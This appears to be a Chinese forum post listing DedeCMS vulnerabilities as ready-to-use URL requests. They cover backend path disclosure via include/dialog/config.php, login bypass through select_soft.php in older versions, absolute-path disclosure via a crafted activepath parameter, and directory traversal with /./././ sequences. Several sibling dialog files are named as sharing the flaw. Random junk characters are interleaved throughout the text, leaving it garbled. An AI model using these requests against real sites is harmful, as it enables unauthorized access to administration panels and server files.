1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
! q+ p- N# ]8 b2 `3 ?+ ^- U! W$ E+ d) v9 x! }
员帐号,新版本的就直接转向了后台.
# U% R* a7 y0 |* @
# N3 o4 s; f u6 N" ~2.include/dialog/config.php会爆出后台管理路径
3 D3 a, C5 `9 }! L! b4 N* o2 N% f- K/ ^2 c
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
# [* i2 l) I6 ^' E% v/ G9 T8 j0 t
# B4 A" N3 G! X6 Q4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.2 {7 |7 r5 d/ ~1 U
! e7 Y( Z( D5 C& Z5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉" t0 J, ~" g* y8 G* z6 s
0 f$ `% y1 b" I/ g到根目录去.不过这些版本的访问地址有些不同.& N9 w# t1 C$ G" |
地址为require/dialog/select_soft.php?activepath=/././././././././
4 L2 v# F1 w6 r: F- B) d9 i, g! h' q. }3 s. N
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..! g) `" v. G* q& V Q
存在相同问题的文件还有0 w& M7 k; [' X9 d _- J
include\dialog\select_images.php
# n! }% L4 n& }- R- Rinclude\dialog\select_media.php# ~& u% D8 F6 K# k# p9 p" i
include\dialog\select_templets.php
! ]# }0 z4 L+ K' M9 x" y. D6 T |